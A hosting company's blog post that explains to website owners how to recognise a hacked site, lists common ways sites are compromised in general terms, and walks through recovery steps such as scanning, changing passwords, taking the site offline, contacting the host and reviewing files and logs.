So, you have been hacked! All right, you’re not alone here; it happens to many website owners since hacked websites are becoming increasingly common. Recent industry reports indicates alarming fact that more than 70% of websites have critical security flaws. If it is not happened right now, it may happen in the near future; or you may have hackers visiting your website to find loopholes to crack it down someday.
Therefore, it is essential for webmasters to take all possible precautions rather being low hanging fruit for Hackers. But what if you have already been hacked? Read this article further to know how it happens, and what actions you should take to getting your website running again.
How do I know If I am hacked?
It does not require any special skills to determine that you’ve been hacked. You browse your website like everyday and you find your website defaced. OR The most common one is; when your website is replaced by page with black background and has a big symbol and a message saying “Hacked by some_group_name”.
In many cases, you get redirected to some unpleasant websites like porn or pharmaceuticals webpages. If you have experienced any of above, it is obvious that you’ve been hacked. Some smart hackers do not want you to know that your website is hacked. They may not deface your webpage with flashy banners and logos. Instead they prefer that you didn’t know about it, so they can use your website as long as they can to carry out malicious intentions.
Nowadays, black hat SEO hackers run spam campaigns to endorse online stores that sell cheap “replicas” of popular luxury brands. Mostly, method remains same but these doorway pages are occasionally optimized according to latest events and festivals. i.e. links for Christmas would be something like “Christmas specials cheap louis Vuitton”.
Generally, such links point to the home page of infected website. These compromised websites may have a block of hidden spammy links at the bottom of HTML code like following:
You can also search your website in Google or in Bing like;
site:yourdomain.com any spammy word …….i.e. site:mywebsite.com cheap
If search engine lists some unusual webpages with spammy links, you must be hacked by some parasites. In such cases, you can scan your website through Sucuri SiteCheck and Unmask Parasites.
Instead of discussing, let’s make short summary of signs that indicate that you have been hacked.
- Browsers indicate that your website may be compromised.
- Your website default page is replaced by some flashy page.
- Your website redirects to some offensive webpages.
- Search Engines notifies you that your website has malicious contents.
- You notice some strange webpages or some unusual code in website code.
- If you are unable login to administrative areas even using correct login credentials or find yourself locked out.
What could be the possible reasons behind this hack?
Website can be hacked in numerous ways. Following are some common methods hackers use to hack around the Internet:
- Guessing password or social engineering
- Guessing the username and password brute force.
- Take control of backend dashboard in CMS like WordPress using SQL injections.
- Inject malware in local computer to capture your login credentials.
- Finding a security vulnerability in specific software, update, plugin, theme and exploit it.
- Injecting the shells through insecure upload pages in web server to gain control of whole server.
- Hacking someone else’s website that resides on the same shared-server that you are using for your website.
What actions to be taken after being Hacked?
Scan your local computer for Viruses and Malware
To find the culprit, start with your local system. It is possible that source of the infection begins in your local machine. Therefore, install good anti-virus and run a full scan to make sure that your local system is not infected with malware, spyware, Trojans, etc. Before you run full scan make sure your anti-virus software must be up-to-date with latest definitions. For Windows , we recommend Microsoft Security Essentials as it provides real time protection against latest threats.
Change all Passwords
Change the passwords for all users and all accounts for example, FTP access, control panel accounts, administrator account, content management system authoring accounts. Check the list of your website’s users accounts and make sure that hacker has not created any new user account. If you found any unknown accounts, note them down for later investigation. Then immediately delete these accounts to prevent future logins by the hacker.
Take your website offline
When you are already hacked, prevent your website from infecting others and to prevent hackers from further abusing the system. As soon as you come to know that you’ve been hacked take your website offline immediately. Backup your infected website files and MySQL databases rename the folder as the hacked backup. Thus, you can investigate them later at leisure, or restore to them if your cleaning attempt fails.
Immediately contact your web host
If you are using shared host, contact your web host to determine whether this hack has affected other websites in same server. Ask them if they have good copy of backup of your database and website files. If they’ve got your backup, tell them to secure it before it gets overwritten. If you have clean backup of your files in your local system, consider restoring from this backup.
Web content cleanup and post hack investigation
Now open the previously hacked backup folder for post hack analysis. Firstly, review the web content folders, files and their modification time. Prepare list of recently modified folders/files and check if any new file is inserted in modified folder and exact what modification has been done in modified files.
If you see any malicious code inserted in files or any file that do not belong to your website remove/repair them. You can also run full scan of web files through updated anti-virus/malware software. Repair or quarantine your code if possible or consider restore from the good available backup copy.
Note down the timestamp when these files were exploited. It will help you to narrow down the log searching exercise. Digging logs is primary investigation for any hack incident but it requires administrative access. If you have administrative access to system, you can check the event viewer (Windows) or any relevant logs for further investigation. Search for repetitive authorization failed login attempts or FTP logs from unknown IP addresses.
If you had upload page in your website without any file validation and captcha that could be the culprit. Check your upload path if any shell scripts or malicious code is inserted there. Verify the list of user accounts, if you found any unknown account then disable it immediately and search its recent activities in logs.
Check your .htaccess file, index files or any additional default pages to ensure that there is no malicious redirects or any mal-intention code. If you are running WordPress blog check wp-content/themes directory targeting index.php, header.php, footer.php and functions.php.
The most common reasons behind Hacks are poor coding, outdated and insecure scripts, plugins, themes, insecure upload pages. Therefore, to prevent it happening again, you must address these all possible culprits.
There are numerous ways of being hacked and investigation techniques; above list is just like tip of the iceberg. The primary step to be taken in any hack event is to contact hosting provider. Usually, They hold the best position to carry out most of the heavy technical work for you. Getting a website hacked is no fun so keep cool and intimate the support team to get it running soonest possible.
Rahul is CEO at AccuWebHosting.com
. He shares his web hosting insights at AccuWebHosting blog. He mostly writes on the latest web hosting trends, WordPress, storage technologies, Windows and Linux hosting platforms.
Latest posts by Rahul Vaghasia (see all)
(Visited 78 times, 1 visits today)